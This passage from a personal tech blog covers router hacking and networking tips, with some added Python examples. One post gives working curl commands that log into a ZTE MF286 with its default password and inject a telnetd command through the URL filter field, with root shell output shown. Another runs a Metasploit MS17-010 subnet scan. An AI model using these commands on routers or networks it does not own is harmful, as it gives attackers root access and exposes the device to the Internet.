</div>
<div>
<br /></div>
<div>
- After install is complete launch Metasploit</div>
<div>
<b>msfconsole</b></div>
<div>
- Select the module, set the IP subnet to scan and the number of parallel connections, and go</div>
<div>
<b> use auxiliary/scanner/smb/smb_ms17_010</b></div>
<div>
<div>
<b> set RHOSTS 10.0.0.0/24</b></div>
<div>
<b> set THREADS 30</b></div>
</div>
<div>
<b> run</b></div>
<div>
<br /></div>
<div>
And that's about it. You'll soon know how vulnerable you still are.</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[-] 10.0.0.54:445 - Host does NOT appear vulnerable.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[-] 10.0.0.10:445 - Host does NOT appear vulnerable.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[+] 10.0.0.92:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Standard 7601 Service Pack 1)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[-] 10.0.0.100:445 - Host does NOT appear vulnerable.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[-] 10.0.0.250:445 - Host does NOT appear vulnerable.</span></div>
<div>
<br /></div>
</div>
<div>
P.S. To save Metasploit output to a file, use the command "spool /root/mylog.txt" before typing "run".<br />
<br />
<br /></div>
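<div>
Once the scanner output is in a spool file it is easy to turn into a patch list. The following is an added example (Python; not code from the post or from Metasploit) that parses lines in the shape shown above into vulnerable and not-vulnerable hosts and prints a remediation list. The sample lines are constructed to match the post's output; the <span style="font-family: "courier new" , "courier" , monospace;">[*]</span> progress line is an assumed extra line type that the parser has to skip.</div>

```python
import re

# Constructed sample in the shape of the scanner output shown in the post.
# In practice this text would be read from the spool file (e.g. /root/mylog.txt).
SAMPLE_SPOOL = """\
[-] 10.0.0.54:445         - Host does NOT appear vulnerable.
[-] 10.0.0.10:445         - Host does NOT appear vulnerable.
[+] 10.0.0.92:445         - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Standard 7601 Service Pack 1)
[-] 10.0.0.100:445        - Host does NOT appear vulnerable.
[*] Scanned 128 of 256 hosts (50% complete)
[-] 10.0.0.250:445        - Host does NOT appear vulnerable.
"""

# "[tag] host:port - message"; the tag is one of -, +, * or !
LINE_RE = re.compile(
    r"^\[(?P<tag>[-+*!])\]\s+"
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+"
    r"(?P<msg>.*\S)\s*$"
)
# Trailing "(OS description)" that the module appends for vulnerable hosts
OS_RE = re.compile(r"\((?P<os>[^()]*)\)\s*$")


def parse_spool(text):
    """Classify each host line of a spooled smb_ms17_010 run.

    Returns a dict with three lists:
      vulnerable:     [(host, os_description)]
      not_vulnerable: [host]
      other:          [(host, message)] for anything else (errors, timeouts)
    Lines without a host:port prefix (progress lines) are skipped.
    """
    result = {"vulnerable": [], "not_vulnerable": [], "other": []}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        host, msg = m.group("host"), m.group("msg")
        if "VULNERABLE to MS17-010" in msg:
            os_m = OS_RE.search(msg)
            result["vulnerable"].append((host, os_m.group("os") if os_m else ""))
        elif "does NOT appear vulnerable" in msg:
            result["not_vulnerable"].append(host)
        else:
            result["other"].append((host, msg))
    return result


def remediation_report(text):
    """One tab-separated line per host that still needs the MS17-010 patch, sorted by IP."""
    vuln = parse_spool(text)["vulnerable"]
    vuln.sort(key=lambda hv: tuple(int(o) for o in hv[0].split(".")))
    return [f"{host}\tneeds MS17-010 patch\t{os}" for host, os in vuln]


if __name__ == "__main__":
    for row in remediation_report(SAMPLE_SPOOL):
        print(row)
```

<div>
Anything that is neither a hit nor a miss (timeouts, access errors) ends up in the "other" list so it is not silently treated as patched.</div>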
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
Backdoor and root shell on ZTE MF286 (2017-03-26)<br />
<br />
The ZTE MF286 has a built-in factory backdoor allowing root shell access to the embedded Linux running inside the router. However, since we don't know the RSA-2048 private key used for encrypting the device-specific password, we're not able to use it. That doesn't mean we don't have other means to gain a root shell.<br />
<br />
The factory backdoor is triggered by opening a specific URL. The password is the device IMEI in hex, in encrypted form. This value is decrypted using the public key embedded in the firmware; if the result matches the device IMEI, telnetd is started on port tcp/4719.<br />
<br />
Here's the syntax required to trigger the factory backdoor, but it's useless without that encryption key.<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=CHANGE_MODE&change_mode=2&password=XXX"</span><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>We can still gain root shell on this device easily.</b></div>
<div>
<br /></div>
<div>
First we authenticate. The password is Base64 (MIME) encoded; here I use the default password 1234.</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=LOGIN&password=MTIzNA%3D%3D"</span></div>
<div>
<br /></div>
<div>
Next we add a new URL filter rule that exploits a bug in the nvram parser to also start telnetd.</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=URL_FILTER_ADD&addURLFilter=http%3A%2F%2F_L33T_H4X0R_%2F%26%26telnetd%26%26"</span></div>
<div>
<br /></div>
<div>
One can now simply telnet to port 4719 on 192.168.1.1 and log in as "admin" with password "admin".</div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(none) login: admin</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Password: </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">BusyBox v1.15.0 (2016-10-25 20:15:21 CST) built-in shell (ash)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Enter 'help' for a list of built-in commands.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">~ # uname -a</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Linux (none) 2.6.31 #1 Tue Oct 25 20:15:00 CST 2016 mips GNU/Linux</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">~ # </span></div>
</div>
<div>
<br /></div>
<div>
This is persistent and will start telnetd again after the next reboot unless this special URL is removed via the web interface first. <b><u>CAUTION!</u></b> The telnet server also listens on the WAN side, meaning that after activating it ANYONE can log in to your router over the Internet. So only do this with mobile broadband DISCONNECTED.</div>
<div>
<br /></div>
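<div>
The root cause above is a URL filter value that reaches a command line unvalidated, so "&amp;&amp;" inside it becomes a command separator. The following is an added example (Python; not code from the post, from ZTE or from the firmware) showing the vulnerable pattern next to a hardened check that a firmware web handler should apply to such a field: an allowlist on scheme, hostname, port and path, and no shell between the value and nvram. The unsafe builder is my reconstruction of what the bug amounts to, and the benign URL is constructed; the injected value is the one from the post's request, URL-decoded.</div>

```python
import re
from urllib.parse import unquote, urlsplit

# The value from the post's URL_FILTER_ADD request, URL-decoded:
#   http://_L33T_H4X0R_/&&telnetd&&
INJECTED = unquote("http%3A%2F%2F_L33T_H4X0R_%2F%26%26telnetd%26%26")
BENIGN = "http://ads.example.net/tracker"   # constructed benign filter entry


def build_nvram_cmd_unsafe(url):
    """Vulnerable pattern (an assumption of what the post's nvram parser bug
    amounts to): the value is spliced into a command string that a shell
    later evaluates, so '&&' in it chains arbitrary extra commands."""
    return f"nvram set url_filter={url}"   # shell would see: ... && telnetd && ...


# Hostname: dot-separated labels of [A-Za-z0-9-], no leading/trailing '-',
# no underscores (which already rejects the host used in the post's payload).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
# Path: RFC 3986 pchar set minus '&' and ';' so nothing in it can act as a
# separator for a shell or for a key=value store; %XX stays literal.
PATH_RE = re.compile(r"^(?:/[A-Za-z0-9._~%!$'()*+,=:@-]*)*$")


def validate_filter_url(value, max_len=256):
    """Hardened check for a URL filter entry.

    Returns the canonical URL or raises ValueError. Allowlist based: http(s)
    scheme, a syntactically valid hostname, optional numeric port, a path
    from a restricted character set, no userinfo, query or fragment.
    """
    if not isinstance(value, str) or not value or len(value) > max_len:
        raise ValueError("bad length")
    if any(ord(c) < 0x20 or c.isspace() for c in value):
        raise ValueError("control or whitespace character")
    if not value.isascii():
        raise ValueError("non-ASCII character")
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme must be http or https")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo not allowed")
    host = parts.hostname or ""
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname")
    port = parts.port   # raises ValueError itself on a non-numeric port
    if not PATH_RE.match(parts.path):
        raise ValueError("invalid path")
    if parts.query or parts.fragment:
        raise ValueError("query and fragment not allowed")
    netloc = host if port is None else f"{host}:{port}"
    return f"{parts.scheme}://{netloc}{parts.path or '/'}"


def is_safe_filter_url(value):
    try:
        validate_filter_url(value)
        return True
    except ValueError:
        return False


def build_nvram_argv(url):
    """Hardened: validate first, then pass the value as one argv element to
    nvram (no shell involved), so no character in it can become a command."""
    return ["nvram", "set", f"url_filter={validate_filter_url(url)}"]
```

<div>
The two defences are independent: the argv form alone would already stop the "&amp;&amp;telnetd" chain, and the allowlist alone would reject the payload on its hostname, so a bypass needs both to fail.</div>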
Locking custom LTE bands on ZTE MF286 (2017-03-23)<br />
<br />
My ZTE MF286 is running DNA firmware version B04. It's somewhat limited in LTE band selection, but that can easily be worked around with curl.<div>
<div>
First of all, authenticate to the device using a web browser; otherwise these commands will return a failure. You want to see the <i>{"result":"success"}</i> message.</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 2100MHz (B1) / 1800MHz (B3) / 2600MHz (B7) / 800MHz (B20) / 700MHz (B28)</b> - this is default setting</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x8080045"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 1800MHz (B3) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x04"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 2600MHz (B7) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x40"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 800MHz (B20) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x80000"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 700MHz (B28) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x8000000"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 1800MHz (B3) / 2600MHz (B7) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x45"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 800MHz (B20) / 2600MHz (B7) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x80040"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 800MHz (B20) / 1800MHz (B3) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x80004"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b># 700MHz (B28) / 800MHz (B20) only</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=SET_NETWORK_BAND_LOCK&lte_band_lock=0x8080000"</span></div>
</div>
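<div>
The hex values above are consistent with a bit-per-band encoding in which band N sets bit N-1 (B1 = 0x1, B3 = 0x4, B7 = 0x40, B20 = 0x80000, B28 = 0x8000000; the default 0x8080045 is their sum). That encoding is an inference from the listed values, not something the post or ZTE states. The following is an added example (Python; not code from the post) that builds and decodes such masks and decodes every value the post lists; the request builder reuses the post's endpoint and parameter names.</div>

```python
from urllib.parse import urlencode

ROUTER = "http://192.168.1.1"   # LAN address used throughout the post

# Every lte_band_lock value the post lists, keyed by the post's own label
POST_VALUES = [
    ("2100MHz (B1) / 1800MHz (B3) / 2600MHz (B7) / 800MHz (B20) / 700MHz (B28)", 0x8080045),
    ("1800MHz (B3) only", 0x04),
    ("2600MHz (B7) only", 0x40),
    ("800MHz (B20) only", 0x80000),
    ("700MHz (B28) only", 0x8000000),
    ("1800MHz (B3) / 2600MHz (B7) only", 0x45),
    ("800MHz (B20) / 2600MHz (B7) only", 0x80040),
    ("800MHz (B20) / 1800MHz (B3) only", 0x80004),
    ("700MHz (B28) / 800MHz (B20) only", 0x8080000),
]


def band_mask(bands):
    """Bit N-1 for each LTE band N (assumed encoding, see above)."""
    mask = 0
    for b in bands:
        if not 1 <= int(b) <= 64:
            raise ValueError(f"LTE band out of range: {b}")
        mask |= 1 << (b - 1)
    return mask


def mask_to_bands(mask):
    """Inverse of band_mask(): sorted list of bands enabled in the mask."""
    if mask < 0:
        raise ValueError("mask must be non-negative")
    return [i + 1 for i in range(mask.bit_length()) if (mask >> i) & 1]


def band_lock_url(bands):
    """The goform request the post uses, with the mask computed from a band list."""
    params = {
        "isTest": "false",
        "goformId": "SET_NETWORK_BAND_LOCK",
        "lte_band_lock": f"0x{band_mask(bands):x}",
    }
    return f"{ROUTER}/goform/goform_set_cmd_process?{urlencode(params)}"


def decode_post_values():
    """Decode each value listed in the post into the bands it actually enables."""
    return {label: mask_to_bands(value) for label, value in POST_VALUES}


if __name__ == "__main__":
    for label, bands in decode_post_values().items():
        print(f"{label:75s} -> B{', B'.join(map(str, bands))}")
```

<div>
Under this encoding every listed value decodes to exactly the bands in its label except 0x45, which decodes to B1, B3 and B7; a mask for B3 and B7 alone would be 0x44. Whether the firmware accepts an unpadded value such as 0x4 where the post writes 0x04 was not tested here.</div>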
Inside ZTE MF286 router (2017-03-23)<br />
<br />
The ZTE MF286 4G router is built around a Qualcomm QCA9563 SoC with 802.11bgn, a QCA9882 802.11ac WLAN chip, a QCA8337 gigabit switch and an MDM9230 LTE chip. There's also a tempting serial port, knowing that all components used are already supported by LEDE (which has replaced OpenWrt).<br />
<br />
Photos <a href="https://goo.gl/photos/B2UUUM9jz3jsbrtG8">here</a>.<br />
<br />
Inside Huawei B315s-22 4G router (2017-03-23)<br />
<br />
The Huawei B315s-22 contains a Huawei HiSilicon 6361 SoC, a Realtek Ethernet switch and Broadcom WLAN. Not much to see, but some photos <a href="https://goo.gl/photos/jH9Ad4hfS1WSnH5x5">here</a>.<br />
<br />
Linux SNAT with per-connection source address from IP pool (2017-03-19)<br />
<br />
When doing NAT with a pool of addresses to choose from (instead of masquerading), Linux insists on always using the same IP from the pool for a particular source IP. Often this is preferred, but not always. To work around it we need to patch the kernel a bit.<br />
<br />
The code to tamper with is located in net/netfilter/nf_nat_core.c, which also has an explanation for this behavior. There's some discussion about this on <a href="https://patchwork.ozlabs.org/patch/699934/">https://patchwork.ozlabs.org/patch/699934/</a>, which also includes the patch we need to fix this.<br />
<b><br /></b>
<b>Original nf_nat_core.c</b><br />
<span style="font-family: Courier New, Courier, monospace;"><b>283 </b>/* Hashing source and destination IPs gives a fairly even</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>284 </b>* spread in practice (if there are a small number of IPs</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>285 </b>* involved, there usually aren't that many connections</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>286 </b>* anyway). The consistency means that servers see the same</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>287 </b>* client coming from the same IP (some Internet Banking sites</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>288 </b>* like this), even across reboots.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>289 </b>*/</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>290 </b>j = jhash2((u32 *)&tuple->src.u3, sizeof(tuple->src.u3) / sizeof(u32),</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>291 </b>range->flags & NF_NAT_RANGE_PERSISTENT ?</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>292 </b>0 : (__force u32)tuple->dst.u3.all[max] ^ zone->id);</span><br />
<div>
<br /></div>
<div>
All we need to do is replace line 290 with this and remove lines 291 and 292.</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>290 </b>j = prandom_u32();</span></div>
<div>
<br /></div>
<div>
That's it. Now every new connection will get a randomized IP from the specified pool. My use case for this? Quite unique, I guess. This was my first attempt to work around the limitation of Linux IPsec VTI interfaces not supporting more than one client connecting from the same IP address, a situation which is rather common with 4G LTE networks and CGNATs masquerading thousands of users behind a single public IPv4 address.</div>
<div>
<br /></div>
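<div>
To see what the one-line patch changes, here is an added example (Python; a model, not the kernel code and not code from the post) of the pool selection in nf_nat_core.c: the stock kernel hashes the source address (and, unless NF_NAT_RANGE_PERSISTENT is set, the destination) so the same flow endpoints always land on the same pool address, while the patched version draws a fresh 32-bit random value per new connection. The hash function and the modulo reduction stand in for jhash2() and reciprocal_scale(); the pool is the 254.0.0.0/8 range from the post's SNAT rule and the client addresses are constructed.</div>

```python
import hashlib
import ipaddress
import random

# Pool from the post's SNAT rule: --to-source 254.0.0.0-254.255.255.255
POOL = ipaddress.ip_network("254.0.0.0/8")


def _hash32(*chunks):
    """Stand-in for the kernel's jhash2(): any fixed 32-bit hash works for the model."""
    h = hashlib.blake2b(b"".join(chunks), digest_size=4).digest()
    return int.from_bytes(h, "big")


def pick_source_ip(src, dst, persistent=False, randomize=False, rng=None):
    """Model of the source-address choice in nf_nat_core.c.

    Stock kernel:  j = jhash2(src, persistent ? 0 : dst ^ zone)
                   -> the same (src, dst) pair, or the same src with
                      NF_NAT_RANGE_PERSISTENT, always maps to the same address.
    Patched (post): j = prandom_u32()
                   -> every new connection draws independently.
    The kernel reduces j with reciprocal_scale(); modulo is used here.
    """
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if randomize:
        j = (rng or random).getrandbits(32)
    else:
        j = _hash32(src.packed, b"" if persistent else dst.packed)
    return POOL[j % POOL.num_addresses]


def distinct_sources(src, dsts, persistent=False, randomize=False, seed=0):
    """How many different pool addresses connections from src to dsts get.

    A seeded RNG keeps the randomized variant reproducible for the demo.
    """
    rng = random.Random(seed)
    return len({
        pick_source_ip(src, d, persistent=persistent, randomize=randomize, rng=rng)
        for d in dsts
    })


if __name__ == "__main__":
    client = "100.64.1.2"                       # constructed CGNAT-side client
    same_server = ["192.0.100.1"] * 20          # 20 connections to the post's server IP
    print("stock, one server   :", distinct_sources(client, same_server))
    print("stock, persistent   :", distinct_sources(client, same_server, persistent=True))
    print("patched (random)    :", distinct_sources(client, same_server, randomize=True))
```

<div>
With the stock behaviour two clients behind the same CGNAT address that connect to the same server share one pool address, which is exactly the collision the post is working around; the randomized pick gives each new connection its own address with high probability over a /8.</div>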
<div>
Here are the funky rules I came up with. The first one redirects all incoming UDP traffic to Strongswan listening on port udp/4500. The second NATs the connection to a random IP address from the 254.0.0.0/8 subnet. Yes, this is crazy. Yes, this actually works. Yes, it is useful. No, it's not supported by anyone and most certainly isn't how these components were intended to be used.</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">iptables -t nat -I PREROUTING -p udp -d 192.0.100.1 -j REDIRECT --to-port 4500</span></div>
</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">iptables -t nat -I INPUT -p udp -d 192.0.100.1 -j SNAT --to-source 254.0.0.0-254.255.255.255</span></div>
</div>
<div>
<br /></div>
<div>
On the client side my settings are at least as odd. I added the following rule for outbound traffic. It performs DNAT on outbound Strongswan packets. Paired with rightikeport=4500 in ipsec.conf and port=0 + port_nat_t=0 in charon.conf, connections over the Internet use a random UDP source port and a random UDP destination port, yet it's still standard IKEv2 NAT-T traffic to both the client and server processes.<br /><div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">iptables -t nat -I OUTPUT --dst 192.0.100.1 -p udp --dport 4500 -j DNAT --to-destination :1-65535 --random</span></div>
</div>
<div>
<br /></div>
<div>
Have fun. :)</div>
<div>
<br /></div>
Windows 10 audio playback fails over bluetooth (2016-12-17)<br />
<br />
A quick Google search reveals hundreds of posts having exactly the same problem: pairing with a Bluetooth audio device works but there's no audio. Hundreds of posts with incorrect instructions to fix the problem. You do NOT need to uninstall random devices, restart services etc. All you need are the correct Bluetooth drivers, drivers NOT available on Windows Update.<div>
Your best bet is to grab the drivers from the manufacturer's website. Don't waste your time on HP, Dell or Lenovo sites; go straight to the source, which in my case, for the Dell DW380, is Broadcom.</div>
<div>
<br /></div>
<div>
<a href="https://www.broadcom.com/support/bluetooth">https://www.broadcom.com/support/bluetooth</a> [ <a href="http://dump.asiantuntijakaveri.fi/le_bueno_dumpo/broadcom_bluetooth">MIRROR</a> ]</div>
<div>
<br /></div>
<div>
Install the drivers, reboot, pair the Bluetooth speaker, a new window pops up asking if audio should be connected, and that's it.</div>
Vectorworks 2016 SP4 crashes on startup with Intel HD graphics (2016-10-09)<br />
<br />
Vectorworks 2016 SP4 keeps crashing on startup with a fault in module IG75ICD64.DLL when running on a Lenovo W540p laptop with an Nvidia Quadro 1100M. This laptop also has built-in Intel graphics, and the troublesome DLL is part of the Intel driver package.<br />
<br />
Upgrading to the latest drivers from the Nvidia and Intel websites didn't fix the problem. Upgrading to the latest Nvidia Optimus driver package from Lenovo and disabling Intel graphics solved the problem, at the cost of battery life due to Nvidia being always active.<br />
<br />
Get the latest driver from here: <a href="http://support.lenovo.com/fi/en/downloads/ds037642">http://support.lenovo.com/fi/en/downloads/ds037642</a><br />
<br />
And follow the instructions in this thread to turn off Intel graphics and always use Nvidia only: <a href="https://forums.lenovo.com/t5/ThinkPad-P-and-W-Series-Mobile/W540-Disabling-Optimus-in-BIOS-UEFI-gone/td-p/1463401">https://forums.lenovo.com/t5/ThinkPad-P-and-W-Series-Mobile/W540-Disabling-Optimus-in-BIOS-UEFI-gone/td-p/1463401</a><br />
<div>
<br /></div>
<div>
<br /></div>
Dell DW5560 and other Ericsson 3G WWAN modules with Windows 10 (2016-10-04)<br />
<br />
There are Dell drivers for Windows 10, but they fail to install. The reason is that you first need to upgrade the firmware of the Ericsson 3G WWAN module.<br />
<br />
- Download and install <a href="http://www.dell.com/support/home/fi/fi/fibsdt1/Drivers/DriversDetails?driverId=CNYGV">Communications_Driver_CNYGV_WN32_8.2.5.0_A00.EXE</a><br />
- You'll get an error during install, just ignore it<br />
- Download and install <a href="http://www.dell.com/support/home/fi/fi/fibsdt1/Drivers/DriversDetails?driverId=M6PTD">M6PTD_A00_R4A10_Setup_ZPE.exe</a>, this will upgrade the WWAN firmware to R4D02<br />
- You'll get an error from this one as well after the firmware upgrade, just ignore it<br />
- Done, the DW5560 is now visible under network devices in Device Manager and will show up just like WiFi after you insert a valid SIM card<br />
<br />
You can now go to the very latest firmware available by using the <a href="http://support.lenovo.com/fi/en/downloads/ds039685">upgrade</a> from Lenovo. It also works for Dell-branded units and upgrades them from R3C11/R4A10 to R3C11/R4D02.<br />
<br />
Convert Huawei E3372h-153 from HiLink/router-mode to Stick/modem-mode [ UPDATED 2016-09-02 ] (2016-09-02)<br />
<br />
<i>This is an updated version of my original post. I purchased an additional modem that's externally identical to the old one but had a different serial port USB ID (USB\VID_12D1&PID_1442&MI_00) missing from the earlier driver pack, causing the original instructions to fail. I have also included the latest Stick-mode firmware 21.200.07.00.805 I've found and corrected some incorrect information in the original post.</i><br />
<br />
Modern Huawei USB LTE modems can be used in two very different modes. The default is HiLink mode, where the modem functions as a router doing NAT and other nastiness, much like more traditional 4G routers connected over WLAN or Ethernet. Luckily it can be changed to Stick mode, getting rid of at least one layer of NAT and related issues.<br />
<br />
Actually there's also a third mode, which is a subset of Stick: instead of the native NCM interface it uses legacy PPP over an emulated serial port. This can sometimes be useful with older routers with a USB port, but you won't be able to reach full speed in this mode.<br />
<br />
The Internet has plenty of information on how to do that. As is often the case, not all of it is true. The most interesting bits are also written in Russian, and despite huge improvements in Google Translate it's still a bit hit and miss.<br />
<br />
Following these instructions will also resolve Error Code 19 and the "brick" with Error Code 13 (rapidly flashing green LED), which is also why some steps may seem a bit pointless at first. Feel free to skip them and then start again from the beginning when Mr. Error #19 and Mrs. Error #13 bite you. :)<br />
<br />
<div>
You'll need a Windows PC for this. I've used 64-bit Windows 7 and Windows 10 PCs myself.<br />
<br />
If you've tried this before coming here, I'm sure you've seen those "open http://192.168.8.1/html/switchProjectMode.html" instructions. Those are for older models like the E3372s and won't work with the E3372h.<br />
<br />
Hold tight!<br />
<br />
<ul>
<li>Visit either one of these sites to calculate the device-specific "Flash code" based on your IMEI and write it down. Depending on the current firmware running on your device you may or may not need the Flash code later. Better be safe and get one ready so you don't get stuck.</li>
<ul>
<li><a href="http://huaweiunlockcalculator.com/huawei-flash-code" rel="nofollow" target="_blank">Online calculator 1</a></li>
<li><a href="https://3ginfo.ru/custom/new_unlocker.php" rel="nofollow" target="_blank">Online calculator 2</a></li>
</ul>
<li>Download and extract <a href="https://dump.asiantuntijakaveri.fi/le_bueno_dumpo/Huawei_E3372h-153_HiLink-to-Stick2.zip">this ZIP</a> that contains required tools, drivers and firmware images</li>
<li>Install "[1] Mobile Broadband HL Service" by running mbbServiceSetup.exe</li>
<ul>
<li>Installs RNDIS driver</li>
<li>Installs service to switch from CD emulation to RNDIS (like usb-modeswitch on Linux)</li>
</ul>
<li>Install "[2] Datacard Driver" by running Driver_Upgrade.vbs</li>
<ul>
<li>Installs serial port drivers (including FcSerial needed by some devices)</li>
</ul>
<li>Insert E3372h-153 with HiLink firmware to USB port</li>
<ul>
<li>Preferably directly to the PC; avoid cheap Chinese USB extension cables.</li>
<li>Open Device Manager and verify that RNDIS interface is present under Network adapters</li>
<li>Open command prompt and "PING 192.168.8.1" to make sure HiLink firmware is running</li>
</ul>
<li>Run "sw_project_mode.cmd" from "[3] Switchmode E3372h" folder</li>
<ul>
<li>This will enable the "PC UI" serial port required for the firmware upgrade</li>
<li>Wait until you can see it under Ports in Device Manager</li>
<li>"curl: (56) Recv failure: Connection was reset" error is expected and should be ignored</li>
</ul>
<li>Run "Update_WEBUI_17.100.06.00.03_Hilink_V7R2_9x25_CPIO.exe" from "[4] Huawei E3372h WebUI"</li>
<ul>
<li>This updates user interface but doesn't touch rest of the firmware.</li>
<li>If you have Error Code 13 this will fix it. Code 13 ("Authentication failed") is caused by failed attempt to flash firmware resulting in Error Code 19 ("Download failed").</li>
<li>See <a href="http://www.paoli.cz/out/media/HUAWEI_Module_Firmware_Upgrade_Guide_on_Windows_V100R001_01(5).pdf">HUAWEI_Module_Firmware_Upgrade_Guide_on_Windows_V100R001_01(5).pdf</a> for complete list of error codes.</li>
<li>Wait until WebUI update is complete and you can ping 192.168.8.1 again.</li>
</ul>
<li>Run "sw_project_mode.cmd" from "[3] Switchmode E3372h" folder</li>
